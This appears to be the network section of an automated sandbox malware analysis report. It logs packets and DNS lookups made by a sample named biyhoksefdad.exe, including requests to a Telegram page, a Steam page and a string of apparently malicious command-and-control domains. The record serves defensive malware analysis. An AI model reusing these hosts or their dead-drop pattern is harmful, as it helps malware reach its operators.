                                                                                                                                                                                                        Mar 11, 2025 17:29:10.509249926 CET44349710172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:10.515686035 CET44349710172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:10.515727043 CET44349710172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:10.515738964 CET49710443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:10.515755892 CET44349710172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:10.515800953 CET49710443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:10.522629023 CET44349710172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:10.529350996 CET44349710172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:10.529383898 CET44349710172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:10.529402018 CET49710443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:10.529417992 CET44349710172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:10.529459953 CET49710443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:10.529465914 CET44349710172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:10.529489040 CET44349710172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:10.529525995 CET49710443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:10.529613018 CET49710443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:10.529630899 CET44349710172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:10.529639959 CET49710443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:10.529647112 CET44349710172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:12.203118086 CET49711443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:12.203171968 CET44349711172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:12.203237057 CET49711443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:12.203974009 CET49711443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:12.203991890 CET44349711172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:14.328804016 CET44349711172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:14.328986883 CET49711443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:14.330558062 CET49711443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:14.330569983 CET44349711172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:14.330806971 CET44349711172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:14.332108974 CET49711443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:14.332254887 CET49711443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:14.332274914 CET44349711172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:14.332324982 CET49711443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:14.376315117 CET44349711172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:15.495414019 CET44349711172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:15.517590046 CET44349711172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:15.517791033 CET49711443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:15.546797037 CET49711443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:15.546818972 CET44349711172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:16.328258038 CET49712443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:16.328324080 CET44349712172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:16.328419924 CET49712443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:16.328713894 CET49712443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:16.328725100 CET44349712172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:18.162934065 CET44349712172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:18.163033009 CET49712443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:18.188143969 CET49712443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:18.188169956 CET44349712172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:18.188538074 CET44349712172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:18.212240934 CET49712443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:18.212444067 CET49712443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:18.212470055 CET44349712172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:18.212527037 CET49712443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:18.260330915 CET44349712172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:19.068775892 CET44349712172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:19.082386017 CET49712443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:20.462414980 CET49713443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:20.462472916 CET44349713172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:20.462562084 CET49713443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:20.462949991 CET49713443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:20.462963104 CET44349713172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:22.334053040 CET44349713172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:22.334501982 CET49713443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:22.335747957 CET49713443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:22.335764885 CET44349713172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:22.336009979 CET44349713172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:22.337337017 CET49713443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:22.339391947 CET49713443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:22.339421988 CET44349713172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:22.340095043 CET49713443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:22.340106010 CET44349713172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:23.373692989 CET44349713172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:23.373804092 CET44349713172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:23.373857021 CET49713443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:23.388976097 CET49713443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:23.389002085 CET44349713172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:25.507030010 CET49715443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:25.507110119 CET44349715172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:25.507224083 CET49715443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:25.507540941 CET49715443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:25.507558107 CET44349715172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:27.454629898 CET44349715172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:27.454739094 CET49715443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:27.456687927 CET49715443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:27.456708908 CET44349715172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:27.457027912 CET44349715172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:27.458709002 CET49715443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:27.458844900 CET49715443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:27.458882093 CET44349715172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:28.513372898 CET44349715172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:28.513686895 CET49715443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:29.143208027 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:29.143254995 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:29.143322945 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:29.143794060 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:29.143810034 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.085861921 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.085947037 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.087563038 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.087584019 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.087841034 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.089818001 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.090670109 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.090703011 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.090791941 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.090817928 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.090938091 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.090956926 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.091167927 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.091202974 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.091417074 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.091447115 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.091680050 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.091706038 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.091720104 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.091732025 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.091854095 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.091871977 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.091892958 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.091932058 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.092012882 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.092053890 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.092071056 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.092082024 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.092108965 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.092215061 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.092235088 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.092256069 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.092268944 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:31.092437029 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:33.950629950 CET44349716172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:33.950871944 CET49716443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:34.031346083 CET49718443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:34.031388998 CET44349718172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:34.031775951 CET49718443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:34.031775951 CET49718443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:34.031800032 CET44349718172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.252998114 CET49718443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.566823006 CET49720443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.566875935 CET44349720104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.567117929 CET49720443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.567641973 CET49720443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.567653894 CET44349720104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:37.690778971 CET44349720104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:37.690865040 CET49720443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:37.694310904 CET49720443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:37.694334030 CET44349720104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:37.694751978 CET44349720104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:37.696336031 CET49720443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:37.744328022 CET44349720104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:38.822482109 CET44349720104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:38.822514057 CET44349720104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:38.822530985 CET44349720104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:38.822654963 CET49720443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:38.822654963 CET49720443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:38.822684050 CET44349720104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:38.822923899 CET49720443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:38.908379078 CET44349720104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:38.908483982 CET44349720104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:38.908523083 CET44349720104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:38.908577919 CET49720443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:38.908577919 CET49720443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:38.908577919 CET49720443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:38.908869982 CET49720443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:38.908896923 CET44349720104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:38.908911943 CET49720443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:38.908919096 CET44349720104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:38.910674095 CET49722443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:38.910706043 CET44349722104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:38.910770893 CET49722443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:38.911075115 CET49722443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:38.911087990 CET44349722104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:41.053976059 CET44349722104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:41.054063082 CET49722443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:41.066147089 CET49722443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:41.066163063 CET44349722104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:41.066456079 CET44349722104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:41.075005054 CET49722443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:41.116328955 CET44349722104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:41.880070925 CET44349722104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:41.880100012 CET44349722104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:41.880116940 CET44349722104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:41.880132914 CET49722443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:41.880146980 CET44349722104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:41.880212069 CET49722443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:41.984224081 CET44349722104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:41.984328032 CET49722443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:41.984344006 CET44349722104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:41.984389067 CET44349722104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:41.984405994 CET49722443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:41.984550953 CET44349722104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:41.984582901 CET49722443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:41.984608889 CET44349722104.73.234.102192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:41.984625101 CET49722443192.168.2.5104.73.234.102
                                                                                                                                                                                                        Mar 11, 2025 17:29:41.984632015 CET44349722104.73.234.102192.168.2.5

                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        Mar 11, 2025 17:29:03.390073061 CET5715153192.168.2.51.1.1.1
                                                                                                                                                                                                        Mar 11, 2025 17:29:03.396910906 CET53571511.1.1.1192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:06.475009918 CET5074253192.168.2.51.1.1.1
                                                                                                                                                                                                        Mar 11, 2025 17:29:06.487390995 CET53507421.1.1.1192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.255791903 CET6344353192.168.2.51.1.1.1
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.264422894 CET53634431.1.1.1192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.265959978 CET5156053192.168.2.51.1.1.1
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.462259054 CET53515601.1.1.1192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.463797092 CET5777253192.168.2.51.1.1.1
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.474710941 CET53577721.1.1.1192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.481031895 CET5039553192.168.2.51.1.1.1
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.490310907 CET53503951.1.1.1192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.493740082 CET5685253192.168.2.51.1.1.1
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.502366066 CET53568521.1.1.1192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.515969992 CET5786853192.168.2.51.1.1.1
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.524657011 CET53578681.1.1.1192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.527062893 CET5874653192.168.2.51.1.1.1
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.535969019 CET53587461.1.1.1192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.540394068 CET5804553192.168.2.51.1.1.1
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.548990965 CET53580451.1.1.1192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.557868958 CET5125853192.168.2.51.1.1.1
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.565241098 CET53512581.1.1.1192.168.2.5

                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                        Mar 11, 2025 17:29:03.390073061 CET192.168.2.51.1.1.10x9e5dStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Mar 11, 2025 17:29:06.475009918 CET192.168.2.51.1.1.10x1ed5Standard query (0)univerxes.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.255791903 CET192.168.2.51.1.1.10x81b2Standard query (0)begindecafer.worldA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.265959978 CET192.168.2.51.1.1.10x16b3Standard query (0)garagedrootz.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.463797092 CET192.168.2.51.1.1.10x5bfdStandard query (0)modelshiverd.icuA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.481031895 CET192.168.2.51.1.1.10x213Standard query (0)arisechairedd.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.493740082 CET192.168.2.51.1.1.10xbe6bStandard query (0)catterjur.runA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.515969992 CET192.168.2.51.1.1.10xd650Standard query (0)orangemyther.liveA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.527062893 CET192.168.2.51.1.1.10x6a99Standard query (0)fostinjec.todayA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.540394068 CET192.168.2.51.1.1.10x9bb1Standard query (0)sterpickced.digitalA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.557868958 CET192.168.2.51.1.1.10x6602Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                        Mar 11, 2025 17:29:03.396910906 CET1.1.1.1192.168.2.50x9e5dNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Mar 11, 2025 17:29:06.487390995 CET1.1.1.1192.168.2.50x1ed5No error (0)univerxes.shop172.67.213.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Mar 11, 2025 17:29:06.487390995 CET1.1.1.1192.168.2.50x1ed5No error (0)univerxes.shop104.21.16.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.264422894 CET1.1.1.1192.168.2.50x81b2Name error (3)begindecafer.worldnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.462259054 CET1.1.1.1192.168.2.50x16b3Name error (3)garagedrootz.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.474710941 CET1.1.1.1192.168.2.50x5bfdName error (3)modelshiverd.icunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.490310907 CET1.1.1.1192.168.2.50x213Name error (3)arisechairedd.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.502366066 CET1.1.1.1192.168.2.50xbe6bName error (3)catterjur.runnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.524657011 CET1.1.1.1192.168.2.50xd650Name error (3)orangemyther.livenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.535969019 CET1.1.1.1192.168.2.50x6a99Name error (3)fostinjec.todaynonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.548990965 CET1.1.1.1192.168.2.50x9bb1Name error (3)sterpickced.digitalnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Mar 11, 2025 17:29:35.565241098 CET1.1.1.1192.168.2.50x6602No error (0)steamcommunity.com104.73.234.102A (IP address)IN (0x0001)false

                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                        • t.me
                                                                                                                                                                                                        • univerxes.shop
                                                                                                                                                                                                        • steamcommunity.com

                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        0192.168.2.549708149.154.167.994438332C:\Users\user\Desktop\biyhoksefdad.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-03-11 16:29:05 UTC64OUTGET /kz_prokla2 HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Host: t.me
                                                                                                                                                                                                        2025-03-11 16:29:06 UTC512INHTTP/1.1 200 OK
                                                                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                                                                        Date: Tue, 11 Mar 2025 16:29:06 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                        Content-Length: 12363
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Set-Cookie: stel_ssid=ccd2df26ae62a59bd6_10192532277023105280; expires=Wed, 12 Mar 2025 16:29:06 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Cache-control: no-store
                                                                                                                                                                                                        X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                        Strict-Transport-Security: max-age=35768000
